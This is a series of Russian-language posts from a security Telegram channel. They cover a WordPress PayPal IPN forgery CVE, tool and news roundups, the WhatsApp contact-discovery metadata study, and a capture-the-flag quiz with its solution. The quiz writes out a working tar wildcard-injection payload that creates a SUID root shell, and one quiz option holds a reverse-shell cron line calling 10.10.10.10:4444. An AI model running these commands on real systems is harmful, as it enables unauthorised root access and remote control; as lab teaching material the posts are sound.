🚨 WordPress плагин с бесплатными донатами

Уязвимость CVE-2025-13384 позволяет подделать любой платёж БЕЗ ДЕНЕГ. Фейковый IPN запрос → заявка помечена как «оплачена» → атакующий получает доступ/услугу бесплатно

⚠️ Кто под ударом:

CP Contact Form with PayPal (≤ 1.3.56) — плагин для форм с приёмом платежей

🔴 Почему это работает:

— Нет проверки PayPal IPN подписи
— Нет аутентификации запросов
— Любой может отправить POST на /cp_contactformpp_ipncheck
— Система считает что деньги пришли

🎥Что под угрозой:

— Donation формы (пожертвования)
— Payment формы (оплата услуг)
— Registration формы (регистрация с оплатой)
— Любые submission помечаются как paid

🎥 Что делать:

— Обновить плагин до версии 1.3.57+
— Через Dashboard → Plugins → Update
— Проверить логи на подозрительные IPN запросы
— Сверить платежи в PayPal с заявками на сайте

🔗 Обновить плагин
🔗 Детали уязвимости

🔹 ML для старта в Data Science
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib

🐸 Библиотека хакера

#cve_bulletin

📎 Инструмент недели: AltSendme

Быстрые P2P-передачи без облаков и без регистрации. AltSendme — открытый инструмент, который отправляет файлы напрямую между устройствами, шифруя всё по пути.

➡️ Что умеет:

— Прямое P2P без хранения на серверах
— E2E-шифрование (QUIC + TLS 1.3 + BLAKE3)
— Работает в локалке и через интернет
— Любые файлы и папки, без лимитов
— Возобновление прерванных загрузок
— Очень быстро — до многогигабитных скоростей
— Нет аккаунтов, логов и трекинга
— Есть CLI и готовые билды под Win/macOS/Linux

➡️ CLI пример:

# Отправить файл
sendme send ./video.mp4

# Получить файл по коду
sendme receive ABC-123

# Передать директорию
sendme send ./project

➡️ Зачем нужно:

Чтобы передавать большие файлы быстро, приватно и без зависания на облаках. Идеально для разработчиков и тех, кто ценит безопасность.

🔗 Ссылка на GitHub

🔹 Курс «Программирование на языке Python»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib

🐸 Библиотека хакера

#tool_of_the_week

🙌 Google Colab теперь в VS Code — плюс для исследователей и багхантеров

Google выпустил расширение Colab для VS Code: теперь облачные GPU/TPU Colab работают прямо в привычном редакторе. Для ИБ это не просто удобство — это новый рабочий инструмент.

🔤 Почему это важно:

— Изолированная среда для анализа артефактов. Можно запускать подозрительные скрипты, обрабатывать дампы, PCAPы и malware-образцы в облачном runtime, не рискуя рабочей машиной.

— Ускорение ML-детекта. SOC-аналитики и исследователи могут быстро обучать/тестировать модели аномалий и UEBA на GPU без развёртывания локальной инфраструктуры.

— Быстрые PoC и совместная работа. Ноутбук в Git + Colab runtime → удобный формат для демонстрации атак, анализа данных и верификации гипотез в команде.

— Работа с тяжёлыми наборами данных. Логи, телеметрия, форензика — всё, что обычно тормозит локально, теперь можно гонять в облаке через VS Code.

🅰️ Как начать:

 1. Установить расширение Colab в VS Code.
 2. Открыть .ipynb.
 3. Подключиться к облачному runtime.

Дальше — обычная работа в редакторе, но с мощностью облачной инфраструктуры.

🔗 Подробнее по ссылке

🐸 Библиотека хакера

#patch_notes

🛏 Крупнейшая утечка метаданных: кейс WhatsApp 2025

Исследователи из University of Vienna взяли обычную функцию WhatsApp — Contact Discovery — и через неё собрали данные 3.5 миллиарда аккаунтов. За несколько месяцев. Без единой блокировки.

🔵 Как работала эксплуатация:

Механизм простой: WhatsApp позволяет проверить, зарегистрирован ли номер в системе. Легитимная функция для синхронизации контактов.

Исследователи сгенерировали 63 миллиарда потенциальных номеров для 245 стран и начали массовую проверку через официальный API.

Скорость атаки:
→ 7,000 номеров в секунду
→ Более 100 миллионов в час
→ Первые 30 млн американских номеров за 30 минут

Защита? Отсутствовала. Никакого rate limiting, никаких блокировок.

Кампания шла с декабря 2024 по апрель 2025 — пока не собрали весь глобальный датасет.

🔵 Что оказалось в открытом доступе:

Формально только то, что сами пользователи сделали публичным:

→ Телефонные номера (3.5 млрд активных)
→ Фото профиля у 57% аккаунтов
→ Публичные ключи шифрования и временные метки
→ Метаданные: возраст аккаунта, ОС, количество устройств

🔴 Последствия:

Геополитика: миллионы активных аккаунтов обнаружены в странах с запретом WhatsApp — Китай, Иран, КНДР, Мьянма. Власти этих стран преследуют за обход блокировок, теперь есть готовый список целей.

Региональные особенности: в Западной Африке 80% профилей были публичными — максимальная утечка метаданных. В других регионах показатели ниже, но общий объём критичен.

Потенциал для атак: база из 3.5 млрд номеров с привязкой к метаданным идеальна для таргетированного фишинга, SIM-swap и социальной инженерии. 9% датасета — WhatsApp Business аккаунты с расширенной информацией о компаниях.

🔴 Реакция Meta:

Детальный отчёт Meta* получила в августе 2025. Первые меры внедрили в сентябре, полную митигацию — в октябре.

Исследователи удалили датасет после анализа и получили баунти через официальную программу. Доказательств эксплуатации реальными злоумышленниками не найдено.

*Корпорация Meta признана в РФ экстремистской

🐸 Библиотека хакера

#breach_breakdown

📚 Пошаговый гайд по разработке эксплойтов для ядра Linux

На практическом примере CVE-2017-11176 авторы разбирают весь цикл: от анализа уязвимости до написания работающего кода. Показаны инструменты отладки, объяснены внутренние механизмы ядра и типичные ошибки при разработке.

🔴 Материал старый (2018), но подход актуален. Хорошая база для тех, кто хочет понять низкоуровневую эксплуатацию в Linux.

🔹 Курс «Программирование на языке Python»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib

🐸 Библиотека хакера

#cheat_sheet

🐧 Wildcard Injection Challenge

Сценарий: shell от www-data, sudo нет, SUID чистые.

Нашли cron:

* * * * * root cd /var/www/html && tar -czf /backups/site.tar.gz *

Права:

drwxrwxrwx 2 www-data www-data /var/www/html
-rwxr-xr-x 1 root root /opt/scripts/backup.sh

Цель: root shell через wildcard injection

❓ Какой payload положите в /var/www/html/:

🔥

echo "cp /bin/bash /tmp/r; chmod +s /tmp/r" > x.sh
chmod +x x.sh
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=/bin/sh x.sh»

👾

ln -s /etc/shadow shadow.txt
tar -czf exploit.tar.gz shadow.txt

❤️

echo '* * * * * root bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' > /etc/cron.d/rev

🤩

chmod 777 /opt/scripts/backup.sh
echo "cp /bin/bash /tmp/r && chmod +s /tmp/r" > /opt/scripts/backup.sh

Подсказка: tar * раскроет имена файлов в аргументы. После срабатывания: /tmp/r -p → root.

🐸 Библиотека хакера

#ctf_challenge

😮😮

🐸 Библиотека хакера

#hack_humor

🔥 Подборка новостей

➡️ Критические уязвимости в Fluent Bit угрожают облачной инфраструктуре

Обнаружена цепочка из 5 критических уязвимостей в Fluent Bit — инструменте для сбора логов, развёрнутом более 15 миллиардов раз.

🔴 Ключевые CVE:

• CVE-2025-12972: path traversal через несанитизированные теги → запись произвольных файлов и RCE
• CVE-2025-12970: переполнение буфера в Docker-плагине через длинные имена контейнеров
• CVE-2025-12969: обход аутентификации в in_forward плагине

🔴 Масштаб: некоторые уязвимости присутствуют в коде более 8 лет. Затронуты AWS, Google Cloud, Azure, банки, AI-лаборатории.

🔴 Риски: полный контроль над логами, удаление следов атак, инъекция фальшивых событий, RCE, захват облачной инфраструктуры.

🔗 Oligo Security Research

➡️ CISA предупреждает о массовых атаках на Signal и WhatsApp

CISA выпустила предупреждение об активном использовании коммерческого шпионского ПО и RAT против пользователей мессенджеров.

🔴 Цели: действующие и бывшие высокопоставленные правительственные, военные и политические чиновники, а также организации гражданского общества в США, на Ближнем Востоке и в Европе.

🔴 Методы атак:
• Фишинг с поддельными QR-кодами для привязки устройств
• Zero-click эксплойты (включая CVE-2025-21042 для доставки Android-шпиона LANDFALL)
• Поддельные версии мессенджеров (ProSpy, ToSpy, ClayRat)

🔗 The Register

➡️ FBI: $262M убытков от Account Takeover атак в 2025

ФБР получило более 5,100 жалоб на мошенничество с захватом аккаунтов (ATO), приведшее к убыткам более $262 миллионов с начала года.

🔴 Тренд: киберпреступники выдают себя за сотрудников финансовых учреждений, используя AI для создания гипер-реалистичных фишинговых кампаний.

🔗 The Hacker News

🐸 Библиотека хакера

#patch_notes

🔓 Разбор задачи

В cron у root:

* * * * * root cd /var/www/html && tar -czf /backups/site.tar.gz *

Каталог доступен для записи www-data (777).
Команда tar * раскрывает имена файлов как аргументы. Если подложить файлы, имитирующие флаги, tar воспримет их как реальные параметры и выполнит произвольную команду от root.

🎯 Цель: получить root через SUID bash

Payload, который нужно поместить в /var/www/html:

echo "cp /bin/bash /tmp/r; chmod +s /tmp/r" > x.sh
chmod +x x.sh

touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=/bin/sh x.sh"

--checkpoint заставит tar выполнить x.sh в процессе архивации.
Скрипт создаёт /tmp/r — копию bash с SUID-битом.

После срабатывания cron:

/tmp/r -p

Вы получаете root.

➕ Побочные варианты из задачи не подходят:
запись в cron.d недоступна, shadow в архив ничего не даёт, backup.sh не перезаписать.

Правильный ответ: 🔥

🔹 Курс «Программирование на языке Python»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib

🐸 Библиотека хакера

#ctf_challenge

🌸 Разведка источников

GitHub с PoC'ами — стандарт. HackerOne и Bugcrowd — база. Но половину инсайтов вы выцепили не оттуда.

Это мог быть разбор CVE в чьём-то блоге. Техника из старого write-up на CTFtime. Обсуждение в закрытом дискорде. Или канал в тг, где кто-то постит свежие находки раньше всех.

Что в вашем арсенале ❓

— Каналы и блоги, которые читаете первыми
— Источники PoC и exploit research
— Комьюнити, где делятся методологиями
— Исследователи, за которыми следите

Кидайте ссылки. Может, найдём что-то новое для себя 😠

🐸 Библиотека хакера

#resourse_drop